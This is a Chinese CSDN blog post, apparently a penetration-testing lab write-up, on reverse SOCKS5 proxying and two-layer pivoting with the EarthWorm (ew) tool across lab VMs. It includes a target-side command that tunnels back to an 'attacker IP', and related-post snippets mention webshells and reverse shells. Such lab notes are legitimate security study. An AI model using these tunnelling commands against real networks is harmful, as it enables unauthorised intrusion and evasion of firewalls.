渗透测试之反弹代理(ew的高级用法)反向代理

最新推荐文章于 2024-04-08 15:15:00 发布
最新推荐文章于 2024-04-08 15:15:00 发布
阅读量3k 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/broing55/article/details/104948338
版权

a) 先在一台具有公网 ip 的主机A上运行以下命令:

  ew -s rcsocks -l 1080 -e 8888

  b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

  ew.exe -s rssocks -d 攻击者ip -e 8888

实验环境:win2008r2   双网卡 IP地址 xxx.xxx.xxx.154  vmnet1是10.1.1.1

win2003   vmnet  10.1.1.4 

本地计算机   xxx.xxx.xxx.172

1.本计算机

本地机子有反应

可以联机到w3服务器,也可以远程访问,输入管理员庄户密码就可以

第二个实验

实验环境:

win2008r2   双网卡 IP地址 xxx.xxx.xxx.154  vmnet1是10.1.1.1  win8不开防火墙

win2003   vmnet1  10.1.1.4  vmnet2 172.1.1.1

centos vmnet2 172.1.1.2

本地计算机   xxx.xxx.xxx.172  不开防火墙

 

配置完以后 用win3做代理,其他服务器不能访问奥这个8000端口,需要w2008给做一次端口转发

2008做的端口转发 

本地计算机就可以用 proxyfier 工具 使用 win2008的1080端口做代理 ,因为win2008防火墙是关闭状态

这时使用本地计算机访问一下10.1.1.4 

可以访问到,如果win2008开了防火墙 ,就只能在w2008做个方向代理,用本地计算机连接w2008服务器

二。来个反向代理

本地计算机开放一个9000的端口,win2003还是上面的命令开启8000端口

使用工具把9000和10.1.1.4的8000端口连接起来

打开xshell 连接centos6.5  

ssh 172.1.1.2 输入管理员账户密码

两层反弹端口,然后可以是本地计算机访问到内网的内网的主机172.1.1.2

试验成功

broing55
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ew的使用
课嗨教育的专栏
04-02 463
0x01 需求 当渗透进行到内网,常需要将流量代理到内网进行进一步扩展如: 端口扫描 端口转发 访问内网web服务 …… 0x02 场景 以下模拟一个使用场景。 1、环境配置、网络拓扑 A1 - 120.x.x.x - Kali - 公网攻击服务器 V1 - 10.10.1.111 - Centos - 内网服务器,对公网开放但无公网IP,80端口存在web应用,通过一台nginx对公网开放,现已获得webshell,路由可抵达1...
使用代理实现远程渗透测试
zero
06-30 857
背景描述 很多时候执行远程渗透测试时,客户会限制使用白名单访问(VPN除外)。这种时候我们一般会提供公司出口的IP地址,但是如果人不在公司就不能用此方法,这个时候我们只需要一个具有公网地址的服务器即可。有多种方式,常见如:Nginx正向代理、Squid正向代理、tinyproxy正向代理、proxifier代理。本文先把我体验过的Squid和Nginx两种方式讲一讲。 使用Nginx正向代理 搭建方式 在CentOS操作系统中进行 # 解决依赖 yum install pcre-devel.x86_64 o
【Web安全】浅谈反向代理技术
dzqxwzoe的博客
01-06 206
本文从中间件层(nginx篇、apache篇)、工具层(frp篇)、开发语言层(java篇)浅谈了下反向代理技术在当今互联网中的应用,本文的切入点更倾向于web渗透中面对比较多的HTTP反向代理技术,其中nginx和frp实现的反向代理是基于域名的,而apache和java实现的反向代理是基于路由的,在apache篇结尾我们也提到过了,我们可以借助这些特性和各自的优势组合使用。
正向代理反向代理
buffedon的博客
07-19 599
正向代理反向代理正向代理反向代理Nginx 反向代理端口转发和端口映射端口转发端口映射 代理用在客户端和服务器端之间 正向代理 正向代理是面向客户端的 客户端需要知道服务器的地址 客户端需要配置代理的IP和端口号 对于服务器而言,服务器不知道客户端是谁,只知道代理,可以很好地隐藏客户端。因此我们常常挂一个国外的代理去访问国外的网站。 经常用于内网通过防火墙访问外网,类似于我们上网的过程,只是我们上网的时候一般都没有配置代理反向代理 反向代理是面向服务器的 客户端不知道服务器的地址,只需知道代理
EW之Socks5反向代理内网穿透
sweetie 的博客
09-23 2411
EW(earthworm)功能介绍 EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 准备阶段 在靶机网站上传一句话马使用蚁剑连接 ipconfig /all 一台外网vps:110.42.229.X 一台内网靶机:192.168.1.5(3389开放) 内网机器(无公网ip需要反弹到公网,需要在vps监听
使用EW作Socks5代理进行内网渗透1
08-03
1. 如何使用EW反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
使用Earthworm (EW) 做Socks5代理
01-09
正向代理 1.选择合适的ew文件(将文件ew_…改为ew.exe,为了在命令行少敲几个字母),上传到边缘服务器 2.边缘服务器输入 ew.exe -s ssocksd -l 8000 3.可借助proxifier工具配置攻击机整台机器的代理(proxifier添加...
EW内网渗透
05-06
"EW内网渗透"可能是指一种内网渗透工具或者一套方法论,用于模拟黑客攻击行为,检测并增强网络防御能力。 1. **内网渗透测试**:内网渗透测试是对企业内部网络进行的安全评估,目的是发现潜在的安全漏洞,包括未经...
EarthWorm-master(ew代理转发工具 Linux版本
05-10
希望帮到有需要的人
v1ew-s0urce:59Dark的渗透测试框架和侦察工具
05-20
5 / 9Dark的v1ew-s0urce –渗透测试框架和侦察工具 渗透测试框架,扫描仪等。 v1ew-s0urce用python制成,可以随时随地安装 要了解如何在您的设备上进行安装,请查看 。 加入迪斯科! 我们仍在构建此工具,请查看...
合天实验室:渗透测试项目一
再走一步
04-23 1305
任务一:注入木马 写一个.jpg的木马文件 浏览器设置127.0.0.1:8080代理 将木马上传到网站 用burpsuit抓包 再单击forward放行,回到页面发现成功上传 关闭代理,访问上传的文件(路径上面有)并用get方式提交phpinfo();试试,从下图可以看到上传的文件奏效了 接着使用中国菜刀啦(在tool文件夹下面) 添加木马文件地址...
通过代理隐藏攻击IP
最新发布
zkaqlaoniao的博客
04-08 329
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。打开windows for clash,设置允许局域网连接,查看本机IP ,这里我的代理IP端口是192.168.10.9:13844。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。验证代理设置成功,在vps上抓到IP,并且查询这两个IP为香港IP。打开xshell,打开默认会话属性,设置代理。帮助你在面试中脱颖而出。
渗透测试-window反弹shell
lza20001103的博客
05-11 4301
window反弹shell
渗透测试常用技巧和知识点
weixin_43778463的博客
09-19 299
1
EW代理工具的使用说明
Ays.Ie的博客
05-18 1729
本篇介绍了ew代理转发工具,以及简单的应用
流量映射端口反弹(lcx,ew
wjq18827615690的博客
01-31 743
转载自西梅哥的有道云:https://note.youdao.com/ynoteshare1/index.html?id=a6bf797cce0b6087cb78b44818dca69f&type=note 内网应用 一、端口转发工具: 1.LCX(支持双系统) A、window(LCX) 上传一些内网主机探测的工具 ms17010(适合08,07) 1.首先安装lcx(正向连接) 在内网主机:转发:lcx.exe–slave公网主机ip公网主机端口内网主机ip内网...
端口转发与代理工具 内网代理 内网反弹代理
热门推荐
whatday的专栏
04-09 1万+
理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的 注:文中提到的所有工具下载地址https://github.com/Brucetg/Pentest-tools 一、LCX lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linu...
PHP-FPM Fastcgi 未授权访问漏洞
weixin_30519071的博客
01-10 655
漏洞原理 Fastcgi Fastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。类比HTTP协议来说,fastcgi协议则是服务器中...
渗透技术详解:从ew到cobaltstrike的内网横移
"本文是关于域渗透技术的深入讲解,主要涵盖了多个关键步骤和技术,包括ew穿透、网络扫描、MSF(Metasploit)与CS(Cobalt Strike)的结合使用、内网渗透、横向移动以及权限提升等。文章以红日安全的ATT&CK靶场为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值